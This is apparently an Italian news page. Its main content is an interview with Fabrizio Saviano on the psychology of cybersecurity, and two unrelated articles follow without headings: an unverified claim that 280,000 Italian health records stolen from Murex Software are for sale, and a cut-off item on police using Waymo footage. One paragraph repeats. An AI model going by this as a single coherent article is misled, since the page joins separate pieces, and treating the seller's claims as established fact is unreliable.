Il Rapporto Clusit 2025 come il Report Dark Mirror Q1-2025 di Dark Lab – il laboratorio di Cyber Threat Intelligence di Red Hot Cyber – che hanno analizzato gli incidenti di sicurezza informatica a livello globale, hanno rivelato che l’Italia rimane uno dei paesi più colpiti dalla criminalità informatica: nel primo trimestre del 2025 l’Italia ha registrato inoltre il numero più alto di vittime ransomware mai osservato. Il report di Dark Lab soprattutto, contributo strategico per rafforzare la consapevolezza e la postura difensiva del nostro Paese, sottolinea l’urgenza di adottare nuovi approcci proattivi nell’ambito della sicurezza informatica, come la promozione di una collaborazione piú stretta tra imprese, istituzioni e settore privato.
Tuttavia “è anche tempo di comprendere che la sicurezza è una partita che non si gioca solo tra firewall e antivirus, ma soprattutto nella nostra mente” sottolinea Fabrizio Saviano, che abbiamo intervistato per addentrarci in una materia come il “Cybercognitivismo” che ci spiega: “La vera, sottile minaccia è che, pur sapendo che il rischio è concreto e in aumento, il nostro cervello ci spinge a sottovalutarlo: quel «tanto a me non succederà» è un bias pericoloso quanto una vulnerabilitàzero-day”.
Tuttavia “è anche tempo di comprendere che la sicurezza è una partita che non si gioca solo tra firewall e antivirus, ma soprattutto nella nostra mente” sottolinea Fabrizio Saviano, che abbiamo intervistato per addentrarci in una materia come il “Cybercognitivismo” che ci spiega: “La vera, sottile minaccia è che, pur sapendo che il rischio è concreto e in aumento, il nostro cervello ci spinge a sottovalutarlo: quel «tanto a me non succederà» è un bias pericoloso quanto una vulnerabilità zero-day”.
Fabrizio Saviano, esperto di spicco in questo campo, con una solida carriera che spazia dalla Polizia Postale al ruolo di CISO e una prolifica attività letteraria culminata nel fondamentale “Manuale CISO Security Manager”, ci guida in un’esplorazione affascinante del “Cybercognitivismo”. Questa prospettiva innovativa attraversa la comprensione dei processi mentali per rafforzare la nostra resilienza nel mondo digitale.
Ma l’impegno di Fabrizio Saviano non si ferma al solo ambito professionale. Come presidente dell’Associazione Ri-Creazione incarna un forte spirito sociale, guidato dal motto “Azione, Creazione di nuove opportunità e Ri-Creazione di opportunità per chi le ha perse”. Con un focus sull’inclusione lavorativa di persone fragili a livello cognitivo e sociale, Ri-Creazione porta avanti progetti concreti, supportata da istituzioni, media e dalla convinzione che la diversità sia una risorsa preziosa, specialmente nel complesso mondo della cybersicurezza.
In questa intervista esclusiva con Red Hot Cyber, Fabrizio Saviano ci offre una visione su come rivoluzionare l’approccio alla sicurezza, rendendola più efficace e inclusiva, a partire dalle esigenze dei più vulnerabili, per poi estendersi al beneficio di tutti.
Cybercognitivismo, ‘tutti sanno cosa devono fare, ma molti non lo fanno’: intervista a Fabrizio Saviano
“[..] è anche tempo di comprendere che la sicurezza è una partita che non si gioca solo tra firewall e antivirus, ma soprattutto nella nostra mente” _ Fabrizio Saviano
Fabrizio Saviano è un esperto nel campo della sicurezza informatica, delle tecnologie persuasive e del cognitivismo applicato alla cybersicurezza. La sua recente produzione letteraria include “Cyberpersuasione e Cybercapitalismo. Tecnologie persuasive e capitalismo dell’attenzione”, “Cybercognitivismo. La psicologia della cybersicurezza”, “Manuale OSINT per tutti”. Ma tra tutti spicca il fondamentale “Manuale CISO Security Manager”, che serve sia per la preparazione alla certificazione CISSP, sia per la pratica quotidiana di chi gestisce la sicurezza o vorrebbe farne la propria professione.
La carriera professionale di Fabrizio va dalla Squadra Intrusioni della Polizia Postale al ruolo di CISO, contribuendo all’avvio di BT Security in Italia e alla realizzazione della rete della Regione Molise. Nel contempo è anche Istruttore Autorizzato (ISC)² per la certificazione CISSP e presidente dell’Associazione Ri-Creazione. A scuola, la ricreazione rappresenta il momento di svago: un po’ si impara e un po’ ci si diverte, e da questo spirito nasce il motto “Azione, Creazione di nuove opportunità e Ri-Creazione di opportunità per chi le ha perse”. In concreto, l’attività sociale consiste nel sensibilizzare all’inclusione lavorativa le aziende, le istituzioni, i fragili cognitivi (persone con ADHD, DSA, Sindrome di Down, non udenti, dislessici, etc.) e i fragili sociali (detenuti ed ex detenuti, NEET e ELET, over-50 che hanno perso il lavoro, etc.).
In linea con questa missione, Ri-Creazione ha completato corsi gratuiti di formazione specializzata e alcuni progetti PNRR con le scuole della periferia milanese, offrendo concrete opportunità di reinserimento lavorativo. L’associazione è supportata da alcune associazioni della Polizia di Stato, celebrities, istituzioni e media tra cui Red Hot Cyber, a testimonianza dell’impatto sociale del suo messaggio. In questo contesto, Fabrizio Saviano incarna una figura che unisce l’expertise nel mondo cyber con un profondo impegno sociale, dimostrando come la conoscenza e le competenze possano essere messe al servizio della creazione di opportunità e dell’inclusione per le fasce più vulnerabili della società.
1 –Innanzitutto grazie per esserti reso disponibile a questa intervista a nome di tutto il team di Red Hot Cyber. Passo subito alla prima domanda. Hai affermato che “la sicurezza informatica non è solo tecnologia e firewall ma è capire come funziona la nostra mente nel mondo digitale”: ci puoi spiegare di più a riguardo? E aggiungo: quanto contano i processi cognitivi umani – percezione, apprendimento, ragionamento – per la comprensione dei sistemi digitali?
Esatto, la sicurezza informatica può essere rappresentata con il cosiddetto “Triangolo D’Oro” o “PPT”: Persone, Processi e Tecnologie. Le Persone sono il cuore pulsante del sistema: affideresti all’intelligenza artificiale la vita di un essere umano?
Le persone creano, innovano e, alla fine, orchestrano sia i processi che le tecnologie: per fare questo in modo efficace e nei limiti biologici del cervello, hanno bisogno di strutture organizzative e di strumenti tecnici che li supportino. Ecco dove entrano in gioco i Processi e le Tecnologie. I Processi servono ad assicurare coerenza, armonia e standardizzazione nella risposta agli eventi. Grazie a processi ben definiti, se un membro di un team viene svegliato nel cuore della notte a causa di un’emergenza, seguendo il processo sa esattamente cosa fare. Ma in un’era dominata dai dati, dove miliardi di informazioni vengono generate ogni secondo, come possono le persone gestire il sovraccarico informativo? Siamo nell’era dell’infobulimia e dell’infobesità, e qui entrano in gioco le Tecnologie: sono una specie di estensione del nostro cervello che ci aiuta a digerire, analizzare ed interpretare quantità di dati che altrimenti sarebbero ingestibili.
Al contrario, quando la dimensione tecnologica o quella dei processi prendono il posto della dimensione umana, si rischia di perdere di vista il vero scopo per cui tali dimensioni esistono: fornire valore alle persone, semplificare il loro accesso alle informazioni, fluidificare il loro modo di lavorare e, in ultima istanza, renderle in grado di prendere decisioni informate. E i criminali hanno capito da tempo che conoscere le vulnerabilità delle tecnologie e sapere come sfruttarle è più complicato di convincere una persona a concedere un’autorizzazione, e persino a rivelare una password complessa.
Facciamo un esempio: immagina che questa sera al teatro, un prestigiatore in t-shirt ti chiami sul palcoscenico per aiutarlo ad eseguire il proprio trucco magico. Ti mostra le mani e le braccia nude, svuota le tasche e non sembra nascondere proprio niente… Poi, pronuncia la parola magica, fa apparire dal nulla una monetina dietro il tuo orecchio e tu, insieme a tutto il pubblico, rimanete a bocca aperta. Ma come avrà fatto? E scatta l’applauso! Il trucco c’è ma non si vede: questo mago è un professionista che sa fare bene il proprio lavoro e che ha provato il trucco tantissime volte prima di questa sera. Adesso prova ad immaginare la stessa scena, ma sostituendo il prestigiatore con un truffatore. La conclusione sarà «Ma come ho fatto a farmi fregare così?». Bene, entrambi i professionisti hanno saputo fare il proprio mestiere sfruttando le approssimazioni e le scorciatoie che il nostro cervello usa in continuazione per prendere decisioni ogni millisecondo: in una parola, i “bias”. Anche pensare «Tanto io non ho nulla da rubare, perché dovrebbe accadere proprio a me? Tanto io non ci casco e, se dovesse succedere, comunque farò attenzione, comunque chiederò aiuto all’amico esperto, comunque ci pensa l’Ufficio Informatico, l’antivirus, qualcun altro o qualcos’altro» sono tutti bias che il nostro cervello usa per allontanare da sé l’idea stessa del pericolo, in modo da non doverci pensare e poi magari dover anche agire!
2 – Passiamo un attimo al cognitive computing: i sistemi informatici possono imitare i processi cognitivi umani per risolvere problemi complessi, riconoscere pattern, e supportare alcune decisioni. Cosa significa imparare dall’esperienza e adattarsi? Le deduzioni dell’uomo sono davvero similari alle deduzioni prodotte da un computer?
Questo punto molto è molto interessante, perchè che tocca il cuore del Cybercognitivismo. Sebbene i sistemi di cognitive computing possano imitare i processi cognitivi umani per risolvere problemi complessi, riconoscere pattern e supportare decisioni, le deduzioni dell’uomo non sono del tutto simili a quelle prodotte da un computer. Infatti, il cervello umano ha una capacità limitata rispetto ai computer, ma in ottica evoluzionistica, i bias ci hanno permesso di evitare l’estinzione: a volte queste strategie innate di approssimazione ci fanno cadere vittime di una truffa, altre volte invece la scorciatoia si rivela una buona scelta.
Infatti, differentemente dai computer, di fronte a situazioni pericolose, in cui il tempo per prendere le decisioni è alquanto limitato, è di fondamentale importanza avere un cervello che sia capace di processare i dati velocemente e leggere le situazioni con estrema rapidità. Eventualmente, può anche evitare di prendere decisioni e farci semplicemente scappare di fronte al pericolo.
Non è semplice comparare un cervello ad un microprocessore, ma è un esercizio che può essere utile per rendere l’idea di quanto abbiamo bisogno di usare le approssimazioni. Secondo alcuni studi, la capacità computazionale di un cervello medio potrebbe equivalere ad 1 exaflop al secondo, mentre la capacità di memoria potrebbe aggirarsi attorno ai 2,5 petaByte. Per avere un benchmark di riferimento, il supercomputer più potente al mondo supera la capacità di calcolo di 1 exaflop ed è equipaggiato con oltre 700 petaByte di storage: supera il cervello umano, ma non riesce a sostituirlo. Infatti, il cervello non necessita la precisione del computer, è intuitivo nelle valutazioni ed è rapido nella correlazione di informazioni non strutturate.
Pertanto, conferire alla dimensione tecnologica la pretesa di risolvere i problemi (ad esempio, un antivirus o un’intelligenza artificiale generativa) o dedurre qualcosa al posto nostro è ancora una volta un bias!
3 – I nostri meccanismi mentali ci rendono vulnerabili in ambiente digitale: anche quando sappiamo che possiamo cadere nella truffa i nostri bias e la social engineering usata dai criminali ci spingono comunque sempre a sbagliare. Come la sicurezza informatica può riorganizzarsi tenendo conto dei processi cognitivi umani e in che modo possiamo migliorare la nostra resistenza per prendere decisioni più informate controllando i nostri bias?
È vero. Se guardiamo qualsiasi studio sugli attacchi informatici, il fattore umano è direttamente responsabile di 7 tipologie di attacchi su 10 e indirettamente responsabile delle altre tipologie: possiamo affermare che tutte le attuali tecniche e tecnologie di formazione, per quanto avanzate e innovative, non stanno funzionando. Infatti, i nostri meccanismi mentali ci rendono vulnerabili nell’ambiente digitale e i bias cognitivi possono indurci a commettere errori anche quando siamo consapevoli del rischio. Nel libro “Cybercognitivismo” approfondisco proprio le tecniche di ingegneria sociale, cioè l’uso dell’inganno per manipolare le persone affinché esse divulghino informazioni riservate o personali, in modo consapevole e inconsapevole.
Cybercognitismo. La psicologia della sicurezza, Fabrizio Saviano La sicurezza informatica deve riorganizzarsi rifocalizzando l’attenzione sulle persone, ovvero su coloro che operativamente programmano le tecnologie, disegnano i processi, creano le leggi e decidono se essere guardie o ladri. Ecco perché è fondamentale un approccio basato sul Cybercognitivismo per controllare i nostri bias, migliorare la nostra resistenza e prendere decisioni più informate. Nell’omonimo libro presento gli studi scientifici a suffragio di questo nuovo paradigma e propongo alcuni esempi:
Formazione che crei vera consapevolezza: tutti sanno cosa devono fare, ma molti non lo fanno…
Un approccio di tipo “storytelling” nella formazione, che si è dimostrato più efficace del “fact-telling”. Spoiler: la gamification è sopravvalutata.
Esperienze pratiche e coinvolgenti, come simulazioni di phishing che attivino un meccanismo di protezione senza causare un trauma reale (il cosiddetto “trauma-non trauma”). Infatti, insegna di più ricevere un ceffone che non una carezza, perché il ceffone scatena in ognuno di noi la paura di riceverne un altro!
Promuovere la consapevolezza nella valutazione di un messaggio, aiutando a capire le emozioni e le azioni istintive che il messaggio genera.
Creare programmi di formazione che colleghino la consapevolezza informatica con la vita personale. È più facile che una persona impari a creare password forti per il Wi-Fi di casa (cioè, per la propria rete) che per il Wi-Fi dell’ufficio (cioè, per la rete di qualcun altro): questo collegamento abilita la creazione di buone abitudini di igiene personale di sicurezza!
Alfabetizzazione digitale per il personale non specializzato, che deve sviluppare caratteristiche difensive come attenzione, prontezza e reattività.
Incoraggiare un’elaborazione mentale più dettagliata dei problemi, ad esempio chiedendo agli utenti di riagganciare una telefonata inaspettata, eventualmente approfondendo o informandosi. In una parola, una formazione efficace ci insegna ad essere più prudenti e sospettosi.
4 – I nostri bias ci rendono anche manipolabili, nelle nostre decisioni e nei nostri comportamenti, e poco consapevoli delle nostre scelte online. Inoltre ci si preoccupa della sorveglianza dei governi, tuttavia gli schermi stanno diventando i veri padroni delle nostre vite. Tu parli di cyber capitalismo, ovvero il capitalismo dell’attenzione nell’era digitale: come è potuto accadere che la tecnologia, da mezzo di comunicazione e unione stia andando verso la distanza e il distaccamento?
La manipolabilità online di ognuno di noi passa dal ruolo crescente degli schermi nelle nostre vite: la tecnologia può trasformarsi da strumento unificatore a fonte di distanza, e la tecnica di caccia dei predatori consiste proprio nell’isolare la preda dal suo gruppo o dalla sua famiglia, per renderla più vulnerabile. I nostri bias ci rendono manipolabili nelle decisioni e nei comportamenti online, spesso perché abbiamo poca consapevolezza delle nostre scelte: fino ad ora abbiamo parlato di criminali, ma anche tecnologie apparentemente innocue o utili, come i social networks o gli smartwatch, sfruttano i nostri bias per indurci a compiere azioni desiderate da altri. Su questa capacità delle “tecnologie persuasive” di influenzare il nostro comportamento è nata una vera e propria forma di capitalismo: il capitalismo dell’attenzione (la nostra).
La nostra tendenza a perderci in attività online coinvolgenti e senza fine, cioè l’”effetto tana del coniglio“, dimostra la forza attrattiva degli schermi e la tecnologia, da mezzo di comunicazione e unione tra le persone, sta generando distaccamento a causa di diversi fattori:
Inizialmente promessa come soluzione a molti problemi, la tecnologia è pervasiva sulla dimensione umana, forse perché è più facilmente manipolabile.
Tendiamo a fossilizzarci sulle nostre preferenze, perché le tecnologie limitano la nostra esposizione a opinioni diverse alle nostre attraverso meccanismi noti come “filter bubbles” e “echo chambers” creati dalle tecnologie online (ad esempio i social network e le pubblicità mirate).
Le piattaforme adattano il proprio funzionamento in base ai nostri comportamenti, contribuendo a plasmare ulteriormente le nostre dinamiche sociali online, rendendole meno spontanee e spesso progettate accuratamente (il cosiddetto “behaviour design”) per mantenerci connessi agli schermi, in modo da vendere più inserzioni, interazioni e dati comportamentali.
Intere economie digitali (app economy, social network, influencer marketing) sono nate sulla capacità delle tecnologie di influenzarci e monopolizzare la nostra attenzione per venderla agli inserzionisti. Il social network, ad esempio, non è pagato per il risultato della pubblicità, ma per averla mostrata sullo schermo, creando un sistema basato sulla cattura della nostra attenzione. Questa nuova forma di “capitalismo della sorveglianza” si basa su un continuo “esproprio digitale” in cui le aziende ci rendono costantemente “comprensibili” per misurare e sfruttare la nostra libera volontà.
Aziende come le Big Tech e i loro prodotti, insieme agli investimenti di agenzie governative come la statunitense NSA, hanno creato un ambiente favorevole a questa forma di capitalismo.
5 – Un hacker – buono o cattivo – ha una preponderanza del pensiero lento su quello veloce. Cosa ne pensi? Puoi fornirmi le tue osservazioni in materia?
Questa è un’affermazione interessante che merita alcune osservazioni. Cominciamo col dire che i termini “virus” e “hackers” sono un romantico retaggio dei film anni ‘80: ormai gli “smanettoni” si sono evoluti in organizzazioni criminali modernamente strutturate, dotate
di importanti risorse quali fondi di investimento, sponsorship governative e persino consulenti di psicologia che mettono a disposizione la propria expertise per creare truffe più credibili. Queste aziende criminali si sono dotate di reti commerciali, programmi di affiliazione, consulenti esperti in ogni area che erogano servizi avanzati, tra cui persino i call center che guidano i clienti-vittime ad acquistare le criptovalute necessarie per poter pagare il riscatto. Insomma, parliamo di veri e propri providers che forniscono servizi in cloud tramite e-commerce, che rivendono i propri strumenti di attacco anche a quei terzi che, privi delle conoscenze tecniche necessarie a crearne di propri, hanno comunque un proprio elenco di vittime da attaccare.
Fatta questa doverosa premessa, possiamo dire che un hacker, sia esso etico (“buono”) o criminale (“cattivo”), in molte fasi del suo lavoro deve fare affidamento sul pensiero lento. L’analisi di un sistema complesso o della presenza pubblica di una potenziale vittima, la pianificazione di un attacco, lo sviluppo di exploit o la ricerca di vulnerabilità, siano esse tecnologiche o umane, sono tutte fasi che richiedono attenzione ai dettagli, ragionamento logico e una profonda concentrazione.
Queste attività sono tipiche del “pensiero lento”, come descritto da Daniel Kahneman e ripreso dal mio libro “Cybercognitivismo” dal punto di vista dell’hacker. Tuttavia, non credo che si possa parlare di una preponderanza assoluta del pensiero lento: ci sono momenti in cui anche un hacker deve utilizzare il pensiero veloce. Ad esempio, durante la fase di ricognizione iniziale è necessaria la capacità di individuare rapidamente informazioni utili, oppure potrebbe essere necessario adattarsi rapidamente a cambiamenti imprevisti durante l’attacco. Inoltre, la familiarità e l’esperienza giocano un ruolo fondamentale. Un hacker esperto potrebbe aver automatizzato mentalmente alcuni processi che per un principiante richiederebbero un’analisi lenta e dettagliata. In questo senso, il “pensiero veloce” può essere il risultato di anni di “pensiero lento” e apprendimento.
Infine, è importante considerare che le tecniche di ingegneria sociale mirano a sfruttare il “pensiero veloce” della vittima, inducendola a prendere decisioni impulsive senza riflettere attentamente. L’hacker che utilizza queste tecniche deve essere in grado di orchestrare l’attacco in modo da bypassare il “pensiero lento” della vittima e, a tal fine, nel libro “Cybercognitivismo” è stato necessario affrontare anche le tematiche del Cervello Trino, della Programmazione Neuro Linguistica e dello Storytelling usato per truffare, oltre a 50 bias.
6 – A questo punto puoi descrivermi le caratteristiche necessarie di chi lavora nell’ambito della sicurezza informatica?
È giunto il momento di sfatare un mito: non tutti i ruoli legati alla cybersecurity sono tecnici e non è necessario possedere una laurea specialistica, né passare anni davanti al computer per lavorare nell’ambito della sicurezza. Forse proprio a causa di questa convinzione, nel 2022 il Direttore dell’Agenzia di Cybersicurezza Nazionale dichiarò che mancavano 100.000 posti di lavoro. Sicuramente si tratta di ruoli tecnici, ma anche di impiegati amministrativi, ispettori, venditori e tantissime altre figure professionali. Molti di questi ruoli possono essere ricoperti con successo anche da persone con background formativi diversi da quelli strettamente tecnici, purché possiedano le giuste attitudini e siano disposte ad acquisire le competenze specifiche necessarie attraverso corsi, certificazioni ed esperienza sul campo.
Infatti, molti impiegati di un’azienda che produce aerei probabilmente non hanno idea di come sia fatta una cabina di pilotaggio! Ma la passione per una materia e la volontà di apprendere sono i fattori chiave per il successo in qualsiasi settore, specie in un settore così dinamico e in continua crescita come la sicurezza. In generale, tra le caratteristiche necessarie a lavorare nell’ambito della sicurezza, includo:
Curiosità guidata da un obiettivo.
Conoscenza dei sistemi operativi, delle reti, delle applicazioni web, nonché dei concetti di base della programmazione e dell’architettura di sicurezza cyber e fisica. Questo significa banalmente avere familiarità almeno con i concetti fondanti. Ecco perché la curiosità è il primo punto di questa lista!
Capacità di analisi e problem solving, ovvero identificare pattern, ragionare criticamente sui casi pratici che si presentano giornalmente.
Attenzione ai dettagli, soprattutto in attività di analisi, monitoraggio e individuazione di minacce. Gli hacker sono attenti ai dettagli e devi esserlo anche tu.
Capacità di concentrazione prolungata. È qui che i profili neurodivergenti danno il meglio di sé e l’inclusione si riempie di significato.
Mentalità investigativa. Chi lavora nella sicurezza informatica deve essere curioso, ma anche proattivo nel fare domande e non accontentarsi di risposte evasive.
Capacità di comunicare concetti tecnici a persone non tecniche e viceversa: è un esercizio che può cominciare a casa e in famiglia.
Aggiornamento continuo guidato dalla curiosità.
Ancora una volta il Cybercognitivismo ci viene incontro: sfruttando i bias a nostro vantaggio, è possibile selezionare la persona giusta per il lavoro giusto, per poi formarla alla cybersicurezza nell’arco di tre mesi anziché nell’arco di anni.
7- La tua associazione no-profit Ri-Creazione pone una particolare attenzione al gender gap e a categorie fragili, come over 50 e persone autistiche. Riguardo a quest’ultima categoria, molte persone nello spettro autistico mostrano caratteristiche che le rendono particolarmente predisposte a lavorare nella sicurezza informatica per skills come attenzione ai dettagli, abilità visuo-spaziali e capacità di concentrazione prolungata. Abbiamo avuto una lunga conversazione a riguardo: quali sono i superpoteri dell’autismo in attività di analisi, monitoraggio e individuazione di minacce? Puoi fornirmi anche uno scenario dell’ambiente lavorativo ideale?
Ri-Creazione riconosce il valore unico che le persone – in particolare quelle che ricadono nello spettro autistico – possono apportare al campo della sicurezza informatica. Le loro caratteristiche spesso includono:
Attenzione ai dettagli, specie nell’individuare piccole incongruenze e anomalie.
Una predisposizione per la comprensione di pattern visivi e la visualizzazione di dati complessi.
Capacità di concentrazione prolungata.
Una tendenza ad un approccio sistematico e razionale alla risoluzione dei problemi.
Minore suscettibilità all’ingegneria sociale “tradizionale”, proprio grazie alla loro divergenza.
L’ambiente lavorativo ideale per le persone autistiche nella sicurezza informatica dovrebbe essere strutturato e prevedibile, nel senso che i compiti devono essere chiaramente definiti e inseriti in routine stabili. È necessaria una comunicazione chiara e diretta, priva di qualsiasi ambiguità e corredata da istruzioni precise, meglio se specializzate su aree specifiche in cui le loro abilità sono particolarmente utili. Ma anche l’aspetto emotivo deve essere abilitante: l’ambiente deve riconoscere e valorizzare le loro peculiarità, fornendo il supporto necessario per affrontare eventuali difficoltà sociali o sensoriali, ma anche riconoscendo e premiando il loro contributo unico e la loro expertise tecnica.
Se un ambiente di questo tipo permette alle persone autistiche di esprimere al meglio il proprio potenziale, ne beneficiano anche le persone neurotipiche, nonché tutti i colleghi che sono neurodivergenti senza rendersene conto o senza una diagnosi formale.
8 – Mi piace la parola superpotere che usi relazionato ai concetti di diversità come risorsa e forza e alle capacità uniche di ogni individuo. E’ proprio questo che secondo Ri-Creazione crea opportunità? Inoltre gli over 50 nel nostro paese sono difficili da ricollocare, nonostante il valore che l’esperienza porta. Che cosa significa davvero l’esperienza nell’ambito lavorativo e in quello della sicurezza informatica?
Spesso, quando parlo di opportunità per gli over 50, mi rifaccio a un aforisma di Jack Ma, il visionario fondatore cinese di Alibaba, colosso dell’e-commerce che ha rivoluzionato il commercio online a livello mondiale: «Prima dei 20 anni sii un bravo studente. Prima dei 30 anni acquisisci un po’ di esperienza. Tra i 30 e i 40 anni, lavora per te stesso se vuoi davvero essere un imprenditore. Tra i 40 e i 50 anni, concentrati sulle cose in cui sei bravo. Tra i 50 e i 60 anni, dedica il tuo tempo a far crescere i giovani. Quando hai più di 60 anni, goditi il tuo tempo.»
È un vero peccato che nel nostro paese gli over 50 incontrino spesso difficoltà nella ricollocazione, nonostante il grande valore che la loro esperienza può portare. Nell’ambito lavorativo in generale, e in quello della sicurezza informatica in particolare, l’esperienza significa:
Conoscenza pratica, in particolare la comprensione e la dimestichezza con le dinamiche e i processi aziendali.
Capacità di problem solving dettata dall’esperienza nell’affrontare situazioni complesse con maggiore efficacia, attingendo ad un repertorio di soluzioni già testate, a casa come in ufficio. Inoltre, già trovarsi in una situazione precaria dopo i 50 anni è un problema sfidante!
Consapevolezza dei rischi di chi ha già vissuto diverse sfide e incidenti, nella vita personale come in quella professionale.
Mentorship e guida per i colleghi più giovani, trasmettendo il loro know-how e contribuendo alla crescita del team. Banalmente, è lo scopo sotteso dietro i miei libri e lo scopo sociale di Ri-Creazione: condividere la conoscenza ed esperienza.
L’esperienza può contribuire a una visione più ampia e strategica della sicurezza, andando oltre gli aspetti puramente tecnici.
Aver superato sfide lavorative in passato porta una maggiore resilienza e capacità di affrontare momenti difficili.
Nonostante il valore innegabile dell’esperienza, spesso le aziende si concentrano troppo sulle competenze tecniche più recenti, sottovalutando la saggezza e la prospettiva che i professionisti over 50 possono offrire. Nel settore della sicurezza, tra un anno la tecnologia di oggi potrebbe essere vecchia: mi sono già espresso a proposito della curiosità.
9 – La relazione tra vulnerabilità umane e vulnerabilità software/hardware è strettamente interconnessa e rappresenta un aspetto cruciale nella sicurezza informatica. Su questo voglio fare una provocazione: Norbert Wiener, matematico e statistico statunitense, considerato il fondatore della cibernetica, la scienza che studia i processi di controllo e comunicazione negli esseri viventi e nelle macchine ha affermato: “la questione non è più quella della macchine che funzionano come organismi o di organismi che funzionano come macchine. Piuttosto, la macchina e l’organismo devono essere considerati come due stadi o stati funzionalmente equivalenti di organizzazione cibernetica”. Cosa ne pensi, puoi darmi una tua visione?
Norbert Wiener illumina un aspetto fondamentale della sicurezza informatica, ovvero l’interconnessione tra vulnerabilità umane e vulnerabilità software/hardware: entrambe persone e macchine sono soggette a “errori” o “malfunzionamenti”, che nel contesto della sicurezza si traducono in vulnerabilità. Abbiamo detto che i criminali possono sfruttare le vulnerabilità delle tecnologie e, ancora meglio, le vulnerabilità delle persone: gli hacker semplicemente scelgono la strada più comoda… In quest’ottica, tutte le vulnerabilità rappresentano un aspetto fondamentale della sicurezza informatica, sia dal lato di chi attacca, sia dal lato di chi si difende.
Le vulnerabilità software/hardware sono il risultato di errori di progettazione, implementazione o configurazione nelle macchine, mentre le vulnerabilità umane derivano dai limiti cognitivi, dai bias, dalle emozioni e dalla suscettibilità alla manipolazione degli esseri umani. Se è possibile mitigare le vulnerabilità tecnologiche, lo stesso si può fare con le vulnerabilità umane?
Alla provocazione di Wiener, rilancio con una contro-provocazione: se in ambito tecnologico si parla spesso di Ingegneria Informatica, Ingegneria del Software, Ingegneria Elettronica, forse è arrivato il momento di rendere materia di studio anche l’Ingegneria Sociale.
In conclusione, vorrei condividere l’iniziativa sociale che ha preso forma grazie a tutti coloro che hanno partecipato ai corsi e alle iniziative di Ri-Creazione, alle loro famiglie e ai tanti fragili che sono in attesa di una risposta concreta alla propria situazione.
Ri-Creazione sta sviluppando un nuovo modello di protezione digitale che va oltre la semplice formazione.Stiamo creando un ecosistema di supporto che integra competenze tecniche e sensibilità sociale, con tecnologie ergonomiche che sono state pensate specificamente per abilitare ai lavori cyber chi si trova in situazioni di vulnerabilità.
La nostra visione è quella di un “scudo digitale comunitario” che protegga le infrastrutture e le persone, con particolare attenzione a chi ha meno risorse o competenze per formarsi alla cybersicurezza e per difendersi autonomamente. Non si tratta semplicemente di offrire servizi, ma di costruire una rete di protezione sociale attraverso una tecnologia al servizio dell’inclusione: la forza di questo modello risiede proprio nel suo DNA no-profit che mette al centro la persona prima della tecnologia.
È un progetto che nasce dalla Scienza, dall’Esperienza e dal Cybercognitivismo. Per chi condivide questa visione e desidera contribuire a un futuro digitale più sicuro e inclusivo, vi invito a visitare il sito di Ri-Creazione per scoprire come sostenere concretamente questa iniziativa sociale. Insieme possiamo fare la differenza per chi oggi è più esposto ai rischi del mondo digitale.
Un threat actor rivendica l’accesso non autorizzato ai sistemi di Murex Software. In vendita 280.000 profili sanitari italiani completi di dati personali, prescrizioni e certificati medici.
La vicenda ha inizio il 7 marzo, quando un threat actor dallo pseudonimo euet2849, pubblica un primo post sostenendo di aver esfiltrato circa 300.000 profili sanitari di cittadini italiani, specificando che si tratta esclusivamente di soggetti residenti nel Nord Italia (ndr: proseguendo nella lettura, capiremo forse il motivo di questa precisa geolocalizzazione…). Nel messaggio iniziale non viene fornita alcuna informazione sulla provenienza tecnica dei dati, ma solo un listino prezzi che varia da 1 a 35 euro per singolo dossier con diverse “opzioni” di acquisto.
Opzione A
Nome completo, Codice fiscale, Data di nascita, Indirizzo di residenza
Opzione B
Tutti i dati dell’Opzione A con in aggiunta: Indirizzo email, Numero di telefono, Storico prescrizioni mediche dal 2021/2022
Opzione C
Tutti i dati dell’Opzione B con in aggiunta: Prescrizioni mediche recenti in PDF, Certificati medici (permessi di lavoro) in PDF
Il post viene aggiornato il 12 Aprile da parte dell’autore che lo “arricchisce” con nuove informazioni circa i backend da cui sarebbero stati esfiltrati i dati e gli exploit utilizzati.
La società, sempre secondo il post, sarebbe stata contattata per segnalare le vulnerabilità, ma non avrebbe fornito risposta. Secondo quanto riportato nel post i backend violati sono due:
tutti e due presentano gravi vulnerabilità nei controlli delle variabili POST e GET, che hanno permesso l’accesso a dati sensibili sia dei pazienti che dei medici.
Il perchè dei dati sanitari di pazienti del Nord Italia
Analizzando i software indicati, il portale pazienteconsapevole è un software utilizzato in 112 farmacie tra le provincie di Milano, Brescia, Como e Monza Brianza; ecco spiegato il motivo per cui i dati in vendita sono riferibili ai pazienti del Nord Italia, come riportato da euet2849 nel suo post.
Prove tecniche dell’attacco
Nel thread vengono allegati link a materiale dimostrativo che documenterebbe l’accesso non autorizzato ai sistemi di Murex Software e la conseguente esfiltrazione dei dati. Gli screenshot pubblicati mostrano in modo inequivocabile l’accesso sia al portale riservato ai medici curanti, sia a quello dedicato ai pazienti. Va inoltre sottolineato che i dati risultano recenti e aggiornati, confermando con buona certezza che l’attacco è avvenuto intorno alla metà di marzo 2025.
Considerazioni finali
Il data breach rappresenta un grave episodio di esposizione di dati sanitari in Italia, che coinvolge sia il canale medico che quello paziente. La criticità delle vulnerabilità tecniche — legate alla mancata validazione dei parametri sulle chiamate POST e GET — è una problematica ben nota nel mondo dello sviluppo web, ma ancora oggi troppo spesso trascurata.
La presenza di PDF contenenti prescrizioni e certificati suggerisce un livello di compromissione profondo, e una possibile persistenza prolungata del threat actor all’interno dei sistemi bersaglio.
Nessuna dichiarazione ufficiale
Ad oggi, Murex Software non ha rilasciato alcuna comunicazione ufficiale sull’eventuale compromissione dei propri sistemi, pertanto queste informazioni sono da intendere come “intelligence” sulle minacce.
Come nostra consuetudine, lasciamo sempre spazio ad una dichiarazione da parte dell’azienda qualora voglia darci degli aggiornamenti sulla vicenda. Saremo lieti di pubblicare tali informazioni con uno specifico articolo dando risalto alla questione.
RHC monitorerà l’evoluzione della vicenda in modo da pubblicare ulteriori news sul blog, qualora ci fossero novità sostanziali. Qualora ci siano persone informate sui fatti che volessero fornire informazioni in modo anonimo possono utilizzare la mail crittografata del whistleblower.
A Los Angeles la polizia ha iniziato a usare Le auto senza conducente come fonte di prove video. Un caso recente è un chiaro esempio di come le telecamere dei veicoli autonomi stiano diventando uno strumento di sorveglianza.
Il dipartimento di Polizia di Los Angeles ha pubblicato delle riprese video di Waymo, un’auto a guida autonoma di proprietà dell’omonima azienda, che hanno immortalato il momento in cui colpisce il pedone. C’era una persona al volante dell’auto che ha colpito il veicolo e l’incidente è stato classificato come omissione di soccorso.
